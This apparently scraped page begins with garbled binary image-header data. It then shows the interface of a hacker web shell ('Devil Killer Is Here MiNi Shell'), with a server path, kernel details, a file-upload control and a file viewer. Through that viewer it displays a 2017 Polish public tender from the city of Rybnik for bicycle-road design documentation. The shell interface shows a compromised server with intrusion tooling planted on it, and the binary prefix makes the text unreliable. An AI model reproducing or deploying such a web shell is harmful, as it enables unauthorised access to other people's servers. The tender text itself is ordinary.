JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170301/34770-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.um.rybnik.eu' target='_blank'>http://bip.um.rybnik.eu</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 34770 - 2017
              z dnia 2017-03-01 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Rybnik: Opracowanie dokumentacji projektowej przebudowy ulicy Góreckiego, Wielopolskiej, 
i Mikołowskiej w związku z budową dróg rowerowych na terenie miasta Rybnika
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Rybnik, krajowy numer identyfikacyjny
              276255430, ul.
              Bolesława Chrobrego 
              2,
              44-200 
              Rybnik, woj.
              śląskie, państwo
              Polska, tel.
              +48324392302, e-mail
              zam_pub@um.rybnik.pl, faks
              +48324224124.
              <br />
              Adres strony internetowej (URL): www.rybnik.eu<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />bip.um.rybnik.eu</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />bip.um.rybnik.eu</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />forma pisemna<br />
                Adres:
                <br />Urząd Miasta Rybnika, ul. Bolesława Chrobrego 2, pok. 302</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Opracowanie dokumentacji projektowej przebudowy ulicy Góreckiego, Wielopolskiej, 
i Mikołowskiej w związku z budową dróg rowerowych na terenie miasta Rybnika
<br /><b>Numer referencyjny: </b>ZP.271.8.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zadanie składa się z części:
ZADANIE 1
1.	Projekt przebudowy istniejących dróg rowerowych oraz budowy nowych (ZRID): 
1)	ul. Góreckiego  przebudowa (ok. 950m)
a)	od Ronda Solidarności do przejazdu dla rowerzystów w rejonie Oś. Krakusa (ok. 320m)  dwukierunkowe ciągi pieszo  rowerowe po jednej stronie jezdni,
b)	od Ronda Orzepowickiego do Ronda ER (ok. 630m)  dwukierunkowe ciągi pieszo  rowerowe po jednej stronie jezdni. 
2)	ul. Góreckiego  budowa (ok. 1,500km): od przejazdu dla rowerzystów w rejonie Oś. Krakusa do Ronda Orzepowickiego  dwukierunkowa droga dla rowerów po jednej stronie jezdni.

ZADANIE 2
2.	Projekt nowych dróg rowerowych (ZRID) - ul. Wielopolska (ok. 2,470km) 
a)	od skrzyżowania z ulicą Mikołowską do wjazdu do Nadleśnictwa (Szkółka drzew) (ok. 250m)  dwukierunkowe ciągi pieszo  rowerowe po jednej stronie jezdni,
b)	od wjazdu do Nadleśnictwa (Szkółka drzew) do ul. Strąkowskiej (ok. 1,950km)  dwukierunkowa droga dla rowerów po jednej stronie jezdni.
c)	łącznik pomiędzy ul. Wielopolską oraz Pod Wałem przez istniejący obiekt mostowy na  rzece Ruda (ok. 270 m)  4 m ciąg pieszo-rowerowy.

ZADANIE 3
3.	Projekt nowych dróg rowerowych (ZRID) - ul. Mikołowska: od miejsce zakończenia ciągu pieszo  rowerowego 
w rejonie stacji paliw do skrzyżowania z ulicą Wielopolską (ok. 1,200km)  jednokierunkowe ciągi pieszo  rowerowe zamiennie z chodnikiem i jednokierunkową droga rowerową lub pasami rowerowymi w zależności od warunków 
w danej lokalizacji po obu stronach jezdni, w szczególności (w przypadku niekorzystnych warunków terenowych dopuszcza się zawężenie jezdni do szerokości pasów zgodnie z minimum wymaganym w ustawie Prawo o ruchu drogowym)
4.	Projekt scalenia przystanków autobusowych zlokalizowanych na jezdni ulicy Przemysłowej  i ulicy Mikołowskiej
w jeden obsługujący oba kierunki ruchu do centrum miasta, którego wstępną lokalizację wyznacza się za zjazdem do budynku stacyjnego PKP Rybnik Paruszowiec w rejonie budynku Mikołowska 59.
5.	Zaprojektowanie i wykonanie rozwiązania przebudowy skrzyżowania ulic Mikołowska  Przemysłowa uwzględniającego właściwe warunki geometryczne i ruchowe prognozowane na okres 20 letni w dwóch wariantach:
1.	Wariant pierwszy uwzględniający zaprojektowanie:
-	dedykowanego pasa prawo skrętu od strony centrum na ul. Mikołowskiej, będącego kontynuacją co najmniej istniejącej zatoki autobusowej,
-	azylu dla pieszych na drodze głównej o szerokości minimum 2,5m który umożliwi również bezpieczne izolowane lub progresywne sterowanie dzielonym przejściem dla pieszych w ciągu ul. Mikołowskiej,
-	wyznaczenia dwóch dodatkowych przejazdów rowerowych lub wlotów rowerowych sterowanych sygnalizacją świetlną w ramach projektowania dróg rowerowych w tym jeden przez ul. Mikołowską, drugi przez ul. Przemysłową,
-	wyznaczenia dodatkowego pasa do skrętu w lewo dla rowerzystów  wyjeżdżających z ul. Przemysłowej, lub rozwiązania równoważnego od strony ul. Przemysłowej,
-	przebudowy urządzeń obcych kolidujących z przebudową drogi w ramach uzgodnień z ich właścicielami z osobnym wyszczególnieniem na przebudowę obiektów infrastruktury wzdłuż drogi i przebudowę infrastruktury w poprzek drogi. Dla każdej branży osobno,
-	rozbudowy/przebudowy sygnalizacji świetlnej (projekt elektryczny i ruchowy, oraz na czas realizacji robót) o wymagane elementy.
Ze względu na SDR na skrzyżowaniu należy założyć i dążyć do tego aby strumienie ruchu na skrzyżowaniu były niekolizyjne. Pożąda się również oddzielenie jezdni głównej, jezdni dla rowerów i chodnika dla pieszych za pomocą zieleni, jeżeli jest to tylko możliwe.
2.	Wariant drugi uwzględniający zaprojektowanie dodatkowego dedykowanego pasa do skrętu w prawo od strony ul. Przemysłowej. Pożąda się aby łuk ten był dostosowany do przejazdu pojazdów członowych i autobusów przegubowych (zaleca się zastosowanie łuku koszowego).
Projekt musi uwzględniać zachowanie obiektów budowlanych tj. budynków Przemysłowa 2 i Mikołowska 94, oraz musi uwzględniać inne alternatywne rozwiązanie wyjazdu lub wjazdu i wyjazdu do posesji  np. Mikołowska 63,65,67,69,94 Przemysłowa 2,  tj. spoza obszaru objętego sterowaniem sygnalizacją świetlną. Projekt może ingerować w działki i obiekty będące własnością osób i podmiotów trzecich na których zostały wybudowane ogrodzenia, obiekty małej architektury, lub obiekty o powierzchni zabudowy nieprzekraczającej 50m2 w ramach ustawy o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.
Do każdego wariantu należy opracować projekt budowlany oraz kosztorys, oraz specyfikacje techniczne odbioru robót. Rozwiązania sprzętowo-programowe zostaną uzgodnione w ramach opracowywania projektów na etapie ich uzgadniania.
W każdym stadium opracowania projektu należy skonsultować z oficerem rowerowymi oraz innymi wydziałami merytorycznymi przyjęte rozwiązania projektowe. 
Dokumentacje powinny być kompletne i uwzględniać możliwość wybudowania każdego z wariantów osobno i uzyskania decyzji ZRID, przy czym wnioski na decyzję ZRID przygotowuje wykonawca oraz zagwarantuje uzyskanie decyzji na podstawie dostarczonej dokumentacji.
Opracowanie w części D należy tak zaprojektować, aby umożliwić realizację w następujących konfiguracjach:
-	tylko część D
-	część D z częścią E wariant 1
-	część D z częścią E wariant 2
-	część E wariant 1
-	część E wariant 2
-	część E wariant 1 i 2 z częścią D

OGÓLNE WYMAGANIA ZAMAWIAJĄCEGO DOTYCZĄCE WSZYSTKICH ZADAŃ
Wykonawca zobowiązany jest do:
-	aktualizacji podkładów geodezyjnych do celów projektowych wraz z pomiarami sytuacyjno-wysokościowymi,
-	inwentaryzacji zieleni przeznaczonej do likwidacji oraz zieleni znajdującej się w zakresie opracowania, 
-	wykonania badań geologicznych wraz z określeniem warunków gruntowo-wodnych podłoża gruntowego oraz nośności nawierzchni,
-	uzyskania pozwoleń wodno-prawnych,
-	uzyskania decyzji środowiskowych,
-	wykonania specyfikacji technicznej wykonania i odbioru robót budowlanych dla każdej z branż,
-	wykonania projektów podziału nieruchomości,
-	wykonania opisu stanu nieruchomości dla każdej działki ulegającej podziałowi lub zabieranej w całości na rzecz pasa drogowego,
-	wykonania linii rozgraniczających,
-	sporządzenia kosztorysów inwestorskich oraz przedmiarów na podstawie KNR (osobno dla każdej z branż), zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno- użytkowym (Dz. U. z 2004r. , nr 130, poz. 1389),
-	wykonania projektu budowlanego,
-	wykonania projektu wykonawczego,
-	wykonania projektu docelowej organizacji ruchu wraz z zatwierdzeniem,
-	wykonania projektu zieleni przydrożnej na całej długości projektowanej infrastruktury rowerowej
-	uczestniczenie w naradach koordynacyjnych,
-	uzyskania dla dokumentacji pozytywnej opinii oficera rowerowego Urzędu Miasta Rybnika zgodnie z Zarządzeniem nr 12/2016 Prezydenta Miasta Rybnika w sprawie tworzenia korzystnych warunków dla rozwoju systemu transportu zrównoważonego, w tym rowerowego na terenie miasta Rybnika oraz poprawy jakości przestrzeni publicznej na drogach w mieście,
-	uzyskania opinii stowarzyszeń rowerowych:
Gliwicka Rada Rowerowa
ul. Barlickiego 3
44-100 Gliwice
Stowarzyszenie Rowerowe Katowice
ul. PCK 10/1
40-057 Katowice.
W przypadku uzyskania negatywnej opinii stowarzyszeń rowerowych Zamawiający zastrzega możliwość dokonania przez Wykonawcę niezbędnych zmian projektowych w uzgodnieniu z Zamawiającym.
Założenia projektowe:
-	jezdnia o nawierzchni bitumicznej (KR1),
-	oświetlenie parkowe (niskie) uzgodnione z zamawiającym  na odcinku poza koroną drogi,
-	miejsca postoju dla rowerzystów (stojak na rowery typu U, ławeczka, kosz na śmieci  uzgodnione z zamawiającym),
-	parametry geometryczne pasów rowerowych i dróg rowerowych przyjąć:
a.	1,5m dla jednokierunkowych pasów rowerowych i jednokierunkowej drogi dla rowerów,
b.	2,0m dla dwukierunkowej drogi dla rowerów,
c.	2,5m dla jednokierunkowego ciągu pieszo-rowerowego,
d.	3,0m dla dwukierunkowego ciągu pieszo  rowerowego,
-	rozwiązania projektowe muszą być zgodne ze Standardami projektowymi i wykonawczymi systemu rowerowego w Rybniku stanowiącymi załącznik do zarządzenia nr 12/2016 Prezydenta Miasta Rybnika z dnia 11 stycznia 2016 roku.
-	w części D - należy sporządzić rozwiązanie geometryczne przyjmując obsługę linii autobusowych istniejących, na których w perspektywie ilość połączeń autobusowych wzrośnie co najmniej dwukrotnie. Sposób lokalizacji przystanku nie może negatywnie wpływać na obiekt sygnalizacyjny zlokalizowany na skrzyżowaniu ulic Przemysłowa  Mikołowska w szczególności na jego przepustowość, blokowanie strumieni ruchu oczekujących na skręt w lewo i zmniejszenie prędkości ewakuacji pojazdów poniżej 10 m/s na dedykowanych pasach ruchu na wprost. Lokalizację przystanku należy przewidzieć z zachowaniem geometrii wymienionej w przepisach szczególnych. Przy sporządzaniu projektu należy ująć występowanie istniejących zjazdów z drogi do przyległych nieruchomości, które winny zachować swoją funkcjonalność, a także potrzebę lokalizacji wiaty przystankowej.
-	kompleksowe opracowania wynikowe (projekty budowlane, projekty budowlano-wykonawcze, projekty branżowe, w tym projekty organizacji ruchu stałej i tymczasowej, projekt zieleni) winny umożliwić Zamawiającemu wykonanie robót budowlanych w oparciu o zatwierdzoną dokumentację przez właściwe organy administracji publicznej. Projekt budowlany powinien być zgodny z Rozporządzeniem Ministra Infrastruktury z 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego, na podstawie, którego Wykonawca uzyska w imieniu Zamawiającego zezwolenia na realizację inwestycji drogowej oraz Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót oraz programu funkcjonalno-użytkowego oraz Ustawą z dnia 10 kwietnia 2003 r. 
o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych.
Zamawiającemu winna być przekazana dokumentacja osobno dla każdej z części zamówienia, obejmująca:
-	wniosek o zezwoleniu na realizację inwestycji (oddzielnie dla części A, B, C, D, E wariant 1, E wariant. 2),
-	oryginały pozwoleń, uzgodnień i opinii,
-	projekt budowlany (stanowiący załącznik do wniosku ZRID)  4 szt,
-	inwentaryzacja zieleni przeznaczonej do likwidacji oraz zieleni znajdującej się w zakresie opracowania  4 szt,
-	ekspertyza geologiczna  2 szt,
-	projekt wykonawczy z informacją BIOZ  4 szt,
-	projekt docelowej organizacji ruchu  4 szt,
-	specyfikacje techniczne wykonania i odbioru robót  3 szt (dla każdej z branż),
-	projekt podziału nieruchomości  10 szt,
-	opis stanu nieruchomości  2 szt,
-	przedmiar robót  2 szt. (z podziałem na etapy/branże) wykonany w arkuszu kalkulacyjnym xls w stopniu agregacji pozycji przedmiarowych ustalonym z Zamawiającym (przedmiar ten będzie przekazany wykonawcy robót do wycenienia oferty, a pozycje przedmiarowe winny mieć odniesienie do specyfikacji technicznych wykonania i odbioru robót),
-	kosztorys inwestorski  2 szt. (z podziałem na branże).
Dokumentacja winna być dodatkowo opracowana w wersji cyfrowej na nośniku CD lub USB. Przyjmuje się następujące rodzaje plików: całość dokumentacji w formacie pdf.
Dodatkowo należy dołączyć:
	kosztorysy w formacie ath, sko (athena soft, seko),
	część rysunkową w formacie dwg lub dgn (ACAD, Bentley),
	cześć opisową w formacie doc.
Szczegółowy zakres zamówienia precyzuje SIWZ.
<br /><br /><b>II.5) Główny kod CPV: </b>71320000-7<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              243902.44<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 42<br /></div><br /><b>II.9) Informacje dodatkowe: </b>TERMIN REALIZACJI ZAMÓWIENIA: 
1) wykonanie prac projektowych w terminie do 12 miesięcy od daty zawarcia umowy,
2) pełnienie nadzoru autorskiego w terminie do 30 miesięcy liczonych od daty odbioru końcowego kompletu dokumentacji, której dotyczą prace projektowe.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1)	Wykonawca spełni warunek jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, co najmniej dwa opracowania dokumentacji projektowej branży drogowej każde o wartości minimum 100.000 zł brutto oraz każde obejmujące swoim zakresem drogę dla rowerów lub ciąg pieszo  rowerowy o minimalnej długości 1km.
(Zamawiający uzna za spełniające warunki projekty branży drogowej zawierające także budowę oświetlenia ulicznego i kanalizacji deszczowej oraz przebudowę sieci elektrycznych, telekomunikacyjnych i wodociągowych)

W przypadku zamówień, których wartość została wyrażona w umowie w innej walucie niż PLN należy dokonać przeliczenia tej waluty na PLN przy zastosowaniu średniego kursu NBP na dzień zakończenia zamówienia (w przypadku zamówień rozliczanych wyłącznie w walutach innych niż PLN).

Warunek udziału w postępowaniu dotyczący zdolności technicznej i zawodowej dotyczący wykonanych usług, musi być spełniony: 
a)	przez Wykonawcę samodzielnie lub
b)	przez minimum jeden podmiot udostępniający wiedzę i doświadczenie (podwykonawcę) samodzielnie; 
c)	a w przypadku podmiotów występujących wspólnie, samodzielnie przez minimum jednego z wykonawców występujących wspólnie. 
Nie jest dopuszczalne łączenie (sumowanie) wyżej wymaganego doświadczenia w ramach doświadczenia różnych podmiotów zaangażowanych w realizację zamówienia.
2)	Wykonawca spełni warunek jeżeli wykaże, że skieruje do realizacji zamówienia co najmniej jedną osobę, która będzie pełnić funkcję projektanta branży drogowej, posiadającą uprawnienia budowlane w specjalności drogowej do projektowania bez ograniczeń oraz posiadającą co najmniej 2-letnie doświadczenie zawodowe w projektowaniu dotyczącym wymaganych uprawnień, polegające na wykonaniu co najmniej jednego projektu drogowego.

W przypadku specjalistów zagranicznych posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się od Wykonawcy, aby osoby te spełniały odpowiednie warunki opisane, w art. 12a ustawy Prawo budowlane. 

Zamawiający uzna uprawnienia zdobyte na podstawie przepisów obowiązujących przed wejściem w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy  w oparciu o Art. 104 ustawy 
z dnia 7 lipca 1994 r.  Prawo budowlane.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
